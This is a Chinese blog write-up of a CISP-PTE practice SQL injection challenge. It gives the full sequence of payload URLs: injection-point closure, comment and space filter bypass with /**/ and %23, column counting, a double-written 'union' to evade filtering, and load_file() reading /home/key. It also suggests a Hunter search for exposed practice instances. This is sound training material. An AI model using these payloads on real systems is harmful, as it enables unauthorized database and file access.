cisp-pte之SQL注入题一

靶场获取

hunter搜索:body=“cisp-pte 认证考试” 获取免费靶场
在这里插入图片描述

SQL注入题型一

1.审题

通过审题得知题目要求通过SQL注入漏洞读取网站/home/key文件,首先想到SQL语句“load_file()”
在这里插入图片描述
点击进入答题,尝试get请求参数id=1
在这里插入图片描述

2.确认注入点

单引号显示报错在这里插入图片描述

3.尝试闭合

http://maobasix.cn:20001/vulnerabilities/fu1.php?id=1')/**/and/**/1=1%23

通过提示发现#、–、空格等均被过滤,符号尝试url编码绕过,空格通过/**/可绕过。
在这里插入图片描述

4.确认字段数

http://maobasix.cn:20001/vulnerabilities/fu1.php?id=1')/**/and/**/1=1/**/group/**/by/**/4%23
http://maobasix.cn:20001/vulnerabilities/fu1.php?id=1')/**/and/**/1=1/**/group/**/by/**/5%23

group by 4正常回显
group by 5回显报错
由此确认当前表的字段数为4
在这里插入图片描述

在这里插入图片描述

5.确认回显位置

http://maobasix.cn:20001/vulnerabilities/fu1.php?id=1')/**/and/**/1=2/**/uniunionon/**/select/**/1,2,3,4%23

重点在于过滤了union,使用双写即可绕过。
在这里插入图片描述

6.注入获取key

审题时的事key在/home下,直接带入sql语句查询即可。

http://maobasix.cn:20001/vulnerabilities/fu1.php?id=1')/**/and/**/1=2/**/uniunionon/**/select/**/1,2,load_file('/home/key'),4%23

在这里插入图片描述

  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值